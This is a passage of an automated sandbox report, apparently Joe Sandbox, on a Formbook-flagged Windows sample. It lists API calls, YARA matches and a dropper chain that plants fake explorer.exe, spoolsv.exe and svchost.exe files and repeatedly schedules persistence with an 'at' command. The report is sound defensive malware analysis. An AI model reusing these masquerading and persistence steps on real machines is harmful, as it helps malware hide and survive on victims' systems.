Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_022839C3 NtWriteVirtualMemory, 1_2_022839C3
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_0228A1C3 NtResumeThread, 1_2_0228A1C3
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DF00 NtReadVirtualMemory, 4_2_0375DF00
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DE10 NtReadFile, 4_2_0375DE10
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DD60 NtCreateFile, 4_2_0375DD60
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DE0A NtReadFile, 4_2_0375DE0A
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DD62 NtCreateFile, 4_2_0375DD62
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DD1C NtCreateFile, 4_2_0375DD1C
Source: C:\Windows\System\explorer.exe Code function: 4_2_0375DDB2 NtReadFile, 4_2_0375DDB2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9A20 NtResumeThread,LdrInitializeThunk, 29_2_1E3E9A20
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 29_2_1E3E9A00
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 29_2_1E3E9660
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9A50 NtCreateFile,LdrInitializeThunk, 29_2_1E3E9A50
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 29_2_1E3E96E0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk, 29_2_1E3E9710
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3EA3B0 NtGetContextThread,LdrInitializeThunk, 29_2_1E3EA3B0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 29_2_1E3E97A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk, 29_2_1E3E9780
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk, 29_2_1E3E9860
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9840 NtDelayExecution,LdrInitializeThunk, 29_2_1E3E9840
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3EB040 NtSuspendThread,LdrInitializeThunk, 29_2_1E3EB040
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk, 29_2_1E3E98F0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3EAD30 NtSetContextThread,LdrInitializeThunk, 29_2_1E3EAD30
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 29_2_1E3E9910
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9950 NtQueueApcThread,LdrInitializeThunk, 29_2_1E3E9950
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9540 NtReadFile,LdrInitializeThunk, 29_2_1E3E9540
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E99A0 NtCreateSection,LdrInitializeThunk, 29_2_1E3E99A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E95D0 NtClose,LdrInitializeThunk, 29_2_1E3E95D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9610 NtEnumerateValueKey, 29_2_1E3E9610
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9A10 NtQuerySection, 29_2_1E3E9A10
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9670 NtQueryInformationProcess, 29_2_1E3E9670
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9650 NtQueryValueKey, 29_2_1E3E9650
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9A80 NtOpenDirectoryObject, 29_2_1E3E9A80
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E96D0 NtCreateKey, 29_2_1E3E96D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9730 NtQueryVirtualMemory, 29_2_1E3E9730
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3EA710 NtOpenProcessToken, 29_2_1E3EA710
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9B00 NtSetValueKey, 29_2_1E3E9B00
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9770 NtSetInformationFile, 29_2_1E3E9770
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3EA770 NtOpenThread, 29_2_1E3EA770
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9760 NtOpenProcess, 29_2_1E3E9760
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9FE0 NtCreateMutant, 29_2_1E3E9FE0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9820 NtEnumerateKey, 29_2_1E3E9820
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E98A0 NtWriteVirtualMemory, 29_2_1E3E98A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9520 NtWaitForSingleObject, 29_2_1E3E9520
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E9560 NtWriteFile, 29_2_1E3E9560
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E95F0 NtQueryInformationFile, 29_2_1E3E95F0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3E99D0 NtCreateProcessEx, 29_2_1E3E99D0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_005699F7 NtProtectVirtualMemory, 29_2_005699F7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00569A29 NtProtectVirtualMemory, 29_2_00569A29
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_00569EB9 NtProtectVirtualMemory, 29_2_00569EB9
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\icsys.icn.exe File created: c:\windows\system\explorer.exe
Deletes files inside the Windows folder
Source: C:\Users\user\AppData\Local\icsys.icn.exe File deleted: C:\Windows\System\explorer.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 0_2_0041F830 0_2_0041F830
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 0_2_00416130 0_2_00416130
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Code function: 0_2_00422F50 0_2_00422F50
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_00401A5C 1_2_00401A5C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 1_2_00401AAC 1_2_00401AAC
Source: C:\Windows\System\explorer.exe Code function: 4_2_03761306 4_2_03761306
Source: C:\Windows\System\explorer.exe Code function: 4_2_03762212 4_2_03762212
Source: C:\Windows\System\explorer.exe Code function: 4_2_03746FB0 4_2_03746FB0
Source: C:\Windows\System\explorer.exe Code function: 4_2_03760FA6 4_2_03760FA6
Source: C:\Windows\System\explorer.exe Code function: 4_2_0374DE40 4_2_0374DE40
Source: C:\Windows\System\explorer.exe Code function: 4_2_0374DE3B 4_2_0374DE3B
Source: C:\Windows\System\explorer.exe Code function: 4_2_037625BA 4_2_037625BA
Source: C:\Windows\System\explorer.exe Code function: 4_2_03746D90 4_2_03746D90
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C6E30 29_2_1E3C6E30
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E472EF7 29_2_1E472EF7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4722AE 29_2_1E4722AE
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E472B28 29_2_1E472B28
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3DEBB0 29_2_1E3DEBB0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E46DBD2 29_2_1E46DBD2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E471FF1 29_2_1E471FF1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3B841F 29_2_1E3B841F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E461002 29_2_1E461002
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D20A0 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BB090 29_2_1E3BB090
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E4720A8 29_2_1E4720A8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E471D55 29_2_1E471D55
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3A0D20 29_2_1E3A0D20
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3C4120 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3AF900 29_2_1E3AF900
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E472D07 29_2_1E472D07
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3D2581 29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: 29_2_1E3BD5E0 29_2_1E3BD5E0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\icsys.icn.exe F6B230F7A36830E443AEAF69C1826F3188C8C2247C6711D0148E12EC5A29DBB1
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\os9tzxfmtz.exe 446FFBE53145C93AC0D5F2201A7602846D272FD772936583125B0BD0D331D04A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Code function: String function: 1E3AB150 appears 35 times
PE file contains strange resources
Source: os9tzxfmtz.exe .0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: os9TZxfmTZ.exe, 00000000.00000002.252397999.000000000042E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWin.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe, 00000000.00000003.252174241.00000000007A4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameHovedproble7.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe Binary or memory string: OriginalFilenameWin.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe Binary or memory string: OriginalFilenameHovedproble7.exe vs os9TZxfmTZ.exe
Tries to load missing DLLs
Source: C:\Windows\System\explorer.exe Section loaded: tokenbinding.dll
Source: C:\Windows\System\svchost.exe Section loaded: netapi32.dll
Source: C:\Windows\System\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System\svchost.exe Section loaded: drprov.dll
Source: C:\Windows\System\svchost.exe Section loaded: ntlanman.dll
Source: C:\Windows\System\svchost.exe Section loaded: davclnt.dll
Source: C:\Windows\System\svchost.exe Section loaded: davhlpr.dll
Source: C:\Windows\System\svchost.exe Section loaded: cscapi.dll
Source: C:\Windows\System\svchost.exe Section loaded: browcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Uses 32bit PE files
Source: os9TZxfmTZ.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: os9TZxfmTZ.exe, 00000000.00000002.252392951.000000000042C000.00000004.00020000.sdmp, icsys.icn.exe, 00000002.00000002.268744646.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000005.00000002.269404298.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000008.00000002.267615797.000000000042C000.00000004.00020000.sdmp, explorer.exe, 00000026.00000002.289684739.000000000042C000.00000004.00020000.sdmp Binary or memory string: f`P@*\AD:\Code\Explorer\Explorer.vbp
Source: os9TZxfmTZ.exe Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: explorer.exe, 00000004.00000002.366780005.000000000042C000.00000004.00020000.sdmp Binary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@420/11@11/4
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File created: C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_01
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File created: C:\Users\user\AppData\Local\Temp\~DF31C8E74B7E14456D.TMP
Source: C:\Users\user\AppData\Local\icsys.icn.exe Process created: C:\Windows\System\explorer.exe
Source: unknown Process created: C:\Windows\System\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe Process created: C:\Windows\System\explorer.exe
Source: os9TZxfmTZ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\AppData\Local\icsys.icn.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\explorer.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\spoolsv.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\svchost.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\spoolsv.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\System\explorer.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\os9tzxfmtz.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: os9TZxfmTZ.exe Virustotal: Detection: 82%
Source: os9TZxfmTZ.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe File read: C:\Users\user\Desktop\os9TZxfmTZ.exe
Source: unknown Process created: C:\Users\user\Desktop\os9TZxfmTZ.exe 'C:\Users\user\Desktop\os9TZxfmTZ.exe'
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\System\spoolsv.exe Process created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\SysWOW64\at.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: unknown Process created: C:\Windows\System\explorer.exe 'C:\windows\system\explorer.exe' RO
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\System\explorer.exe Process created: unknown unknown
Source: C:\Windows\System\spoolsv.exe Process created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\System\svchost.exe Process created: C:\Windows\SysWOW64\at.exe at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\System\svchost.exe Process created: unknown unknown
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System\svchost.exe Process created: unknown unknown Jump to behavior
